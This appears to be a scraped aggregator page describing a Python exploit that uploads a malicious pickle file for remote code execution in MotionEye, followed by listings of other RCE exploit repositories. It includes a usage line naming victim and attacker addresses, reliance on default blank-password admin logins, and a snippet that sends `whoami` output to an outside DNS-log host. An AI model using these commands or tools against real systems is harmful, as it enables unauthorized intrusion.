A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

Last update: Apr 18, 2022

Overview

MotionEye/MotionEyeOS Authenticated RCE

A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator credentials, so it should not be that big of a deal. Unfortunately, MotionEye/MotionEye tend to be ran with default credentials.

Example:

main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444

Where victim and attacker are in the form of ip:port, unless it is port 80. Then, the port can be excluded. This uses the default username of admin with a blank password. There are also CLI options for alternate usernames/passwords. Please see the code for more details.

See https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye for a writeup on this and other issues.

RCE Exploit for Gitlab 13.9.4

GitLab-Wiki-RCE RCE Exploit for Gitlab 13.9.4 RCE via unsafe inline Kramdown options when rendering certain Wiki pages Allows any user with push acc

52 Nov 9, 2022

RCE 0-day for GhostScript 9.50 - Payload generator

RCE-0-day-for-GhostScript-9.50 PoC for RCE 0-day for GhostScript 9.50 - Payload generator The PoC in python generates payload when exploited for a 0-d

534 Dec 14, 2022

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

92 Jul 20, 2022

CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本： Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

70 Nov 9, 2022

CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

213 Dec 30, 2022

GitLab CE/EE Preauth RCE using ExifTool

CVE-2021-22205 GitLab CE/EE Preauth RCE using ExifTool This project is for learning only, if someone's rights have been violated, please contact me to

164 Dec 10, 2022

Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead ( v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

GoAhead RCE Exploit Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead ( v3.6.5) if the CGI is enabled and a CGI program is dynamic

2 Dec 12, 2021

Hadoop Yan RPC unauthorized RCE

Vuln Impact On November 15, 2021, A security researcher disclosed that there was an unauthorized access vulnerability in Hadoop yarn RPC. This vulnera

25 Nov 24, 2022

Hadoop Yan ResourceManager unauthorized RCE

Vuln Impact There was an unauthorized access vulnerability in Hadoop yarn ResourceManager. This vulnerability existed in Hadoop yarn, the core compone

25 Nov 24, 2022

Comments

CVE-2007-4559 Patch

Patching CVE-2007-4559

Hi, we are security researchers from the Advanced Research Center at Trellix. We have began a campaign to patch a widespread bug named CVE-2007-4559. CVE-2007-4559 is a 15 year old bug in the Python tarfile package. By using extract() or extractall() on a tarfile object without sanitizing input, a maliciously crafted .tar file could perform a directory path traversal attack. We found at least one unsantized extractall() in your codebase and are providing a patch for you via pull request. The patch essentially checks to see if all tarfile members will be extracted safely and throws an exception otherwise. We encourage you to use this patch or your own solution to secure against CVE-2007-4559. Further technical information about the vulnerability can be found in this blog.

If you have further questions you may contact us through this projects lead researcher Kasimir Schulz.

opened by TrellixVulnTeam 1

Owner

Matt

I have no idea what I'm doing.

GitHub

ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i

312 Dec 9, 2022

An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several useful utilites to change the configuration of the device.

TMOHS1 Root Utility Description An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several

40 Dec 29, 2022

A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

Related tags

Overview

MotionEye/MotionEyeOS Authenticated RCE

You might also like...

RCE Exploit for Gitlab 13.9.4

RCE 0-day for GhostScript 9.50 - Payload generator

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-22205 Unauthorized RCE

CVE-2021-22205& GitLab CE/EE RCE

GitLab CE/EE Preauth RCE using ExifTool

Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead ( v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

Hadoop Yan RPC unauthorized RCE

Hadoop Yan ResourceManager unauthorized RCE

Comments

CVE-2007-4559 Patch

Patching CVE-2007-4559

Owner

Matt

ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several useful utilites to change the configuration of the device.

This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit

A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.

WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar

Gitlab RCE - Remote Code Execution

exchange-ssrf-rce

ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

CVE-2021-22986 & F5 BIG-IP RCE

Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10